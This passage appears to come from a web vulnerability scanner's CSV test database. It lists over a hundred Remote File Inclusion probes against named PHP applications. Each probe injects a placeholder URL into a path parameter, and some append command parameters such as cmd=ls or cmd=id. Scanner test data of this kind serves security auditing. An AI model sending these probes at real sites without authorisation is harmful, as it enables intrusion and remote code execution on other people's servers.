Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005611\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/1_Adressbuch/delete.php?folder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005612\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/BackUp/Archive.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005613\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005614\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005615\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005616\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/links/functions.inc?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005617\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/polls/functions.inc?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005618\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/rss_importer_functions.php?sitepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005619\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/safehtml/HTMLSax3.php?dir[plugins]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005620\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/safehtml/safehtml.php?dir[plugins]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005621\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005622\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005623\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005624\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005625\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005626\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005627\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/Import.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005628\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/LogView.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005629\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005630\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005631\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005632\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005633\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/staticpages/functions.inc?_CONF[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005634\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005635\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005636\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plus.php?_pages_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005637\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005638\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005639\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005640\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005641\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005642\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005643\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005644\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005645\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005646\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005647\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005648\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/login.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005649\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005650\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005651\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005652\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005653\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005654\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/podcastgen1.0beta2/core/recent_list.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005655\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/poll/view.php?int_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005656\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pollvote.php?pollname=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005657\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pop.php?base=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005658\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/popup_window.php?site_isp_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005659\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/popup_window.php?site_isp_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005660\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/port.php?content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005661\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/portal/includes/portal_block.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005662\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/portal/portal.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005663\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/portfolio.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005664\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/portfolio/commentaires/derniers_commentaires.php?rep=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005665\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005666\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/prepare.php?xcart_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005667\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/prepare.php?xcart_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005668\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/prepend.php?_PX_config[manager_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005669\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/preview.php?php_script_path=@RFIURL?&cmd=dir\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005670\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/principal.php?conteudo=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005671\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/print.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005672\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/print.php?pager=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005673\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/print.php?print=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005674\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/process.php?DEFAULT_SKIN=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005675\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/professeurs/index.php?repertoire_config=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005676\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/profil.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005677\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/projects/weatimages/demo/index.php?ini[langpack]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005678\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/promocms/newspublish/include.php?path[bdocroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005679\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/protection.php?logout_page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005680\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/provider/auth.php?xcart_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005681\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/provider/auth.php?xcart_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005682\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/psynch/nph-psa.exe?css=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005683\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/psynch/nph-psf.exe?css=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005684\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005685\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/public_html/modules/Forums/favorites.php?nuke_bb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005686\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005687\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005688\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005689\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005690\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/qte_web.php?qte_web_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005691\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/quick_reply.php?phpbb_root_path=@RFIURL&mode=[file]\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005692\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/quickie.php?QUICK_PATH=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005693\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/random2.php?path_to_folder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005694\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/randshop/index.php?incl=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005695\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rdf.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005696\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/reactivate.php?base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005697\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/read.php?data=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005698\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/readmore.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005699\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/recent.php?insPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005700\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rechnung.php?_PHPLIB[libdir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005701\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/reconfig.php?GLOBALS[CLPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005702\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005703\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/redirect.php?url=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005704\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005705\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/register.php?base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005706\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/releasenote.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005707\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rempass.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005708\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/report.php?scriptpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005709\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/reports/who_r.php?bj=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005710\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/resources/includes/class.Smarty.php?cfg[sys][base_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005711\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ressourcen/dbopen.php?home=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005712\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/robotstats.inc.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005713\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/root/public/code/cp_html2txt.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005714\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/routines/fieldValidation.php?jssShopFileSystem=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005715\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005716\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005717\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005718\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005719\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rss.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005720\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rss.php?phpraid_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005721\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rss.php?premodDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005722\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/rss2.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005723\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/run.php?dir=SHELL?&file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005724\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/s01.php?shopid=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005725\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/s01.php?shopid=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 